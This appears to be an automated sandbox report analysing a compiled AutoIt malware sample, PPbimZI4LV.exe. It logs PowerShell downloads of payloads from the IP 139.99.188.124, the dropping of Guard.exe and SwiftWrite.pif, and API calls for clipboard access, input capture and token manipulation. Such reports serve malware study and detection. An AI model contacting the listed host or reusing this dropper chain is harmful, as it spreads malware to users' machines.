0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 71 00 00 00 70 0d 00 00 72 00 00 00 14 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: GET /BlQMSgJx.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: global trafficHTTP traffic detected: GET /xvDYouPUJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439AE87C InternetReadFile,1_2_00007FF6439AE87C
Source: global trafficHTTP traffic detected: GET /xvDYouPUJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /BlQMSgJx.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5E8F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2316243026.0000022C5F817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5E8F7000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.1.drString found in binary or memory: http://139.99.188.124/BlQMSgJx.txt
Source: PPbimZI4LV.exe, 00000001.00000002.2264320173.0000019B59E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/xvDYouPUJ
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FCF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.H
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000008.00000002.2315969638.0000022C5CD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: svchost.exe, 00000013.00000002.3434288775.000001B7CC800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.19.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FF4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5E6D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FD26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FF4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000000.2314147832.00000000001B9000.00000002.00000001.01000000.00000007.sdmp, SwiftWrite.pif, 00000011.00000000.2473325252.0000000000CA9000.00000002.00000001.01000000.00000009.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5E6D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: qmgr.db.19.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000013.00000003.2586107230.000001B7CC740000.00000004.00000800.00020000.00000000.sdmp, edb.log.19.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FF4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5F817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FD26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FD26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Guard.exe.3.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00007FF6439B0D24
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00007FF6439B0D24
Source: C:\Users\Public\Guard.exeCode function: 11_2_00164830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00164830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C54830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,17_2_00C54830
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00007FF6439B0A6C
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643998CAC GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,1_2_00007FF643998CAC
Source: C:\Users\Public\Guard.exeCode function: 11_2_0017D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_0017D164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C6D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,17_2_00C6D164

System Summary

barindex
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: This is a third-party compiled AutoIt script.1_2_00007FF6439237B0
Source: PPbimZI4LV.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: PPbimZI4LV.exe, 00000001.00000000.2186050893.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c35c6d3b-d
Source: PPbimZI4LV.exe, 00000001.00000000.2186050893.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_dc827e31-e
Source: PPbimZI4LV.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_83a12e8c-c
Source: PPbimZI4LV.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_a24b40bc-9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399C110: CreateFileW,DeviceIoControl,CloseHandle,1_2_00007FF64399C110
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64398CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00007FF64398CE68
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_00007FF64399D750
Source: C:\Users\Public\Guard.exeCode function: 11_2_00155778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00155778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C45778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,17_2_00C45778
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439BF6301_2_00007FF6439BF630
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439584C01_2_00007FF6439584C0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439445141_2_00007FF643944514
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A83D41_2_00007FF6439A83D4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64394C3FC1_2_00007FF64394C3FC
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439624001_2_00007FF643962400
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B83601_2_00007FF6439B8360
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439402C41_2_00007FF6439402C4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B63201_2_00007FF6439B6320
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64395A8A01_2_00007FF64395A8A0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439667F01_2_00007FF6439667F0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439CC6D41_2_00007FF6439CC6D4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439C055C1_2_00007FF6439C055C
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439CA59C1_2_00007FF6439CA59C
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643962D201_2_00007FF643962D20
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B6C341_2_00007FF6439B6C34
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643922AE01_2_00007FF643922AE0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439C0AEC1_2_00007FF6439C0AEC
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439530DC1_2_00007FF6439530DC
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643930E701_2_00007FF643930E70
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643940E901_2_00007FF643940E90
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439CCE8C1_2_00007FF6439CCE8C
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643966DE41_2_00007FF643966DE4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643932E301_2_00007FF643932E30
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64392B3901_2_00007FF64392B390
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64396529C1_2_00007FF64396529C
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B32AC1_2_00007FF6439B32AC
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439358D01_2_00007FF6439358D0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64394F8D01_2_00007FF64394F8D0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64392183C1_2_00007FF64392183C
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439618401_2_00007FF643961840
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399D87C1_2_00007FF64399D87C
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439D17C01_2_00007FF6439D17C0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439517501_2_00007FF643951750
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B56A01_2_00007FF6439B56A0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439595B01_2_00007FF6439595B0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643933C201_2_00007FF643933C20
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439CDB181_2_00007FF6439CDB18
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64393FA4F1_2_00007FF64393FA4F
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64392B9F01_2_00007FF64392B9F0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A1A181_2_00007FF6439A1A18
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439CBA0C1_2_00007FF6439CBA0C
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64395793C1_2_00007FF64395793C
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64394C1301_2_00007FF64394C130
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B206C1_2_00007FF6439B206C
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643925F3C1_2_00007FF643925F3C
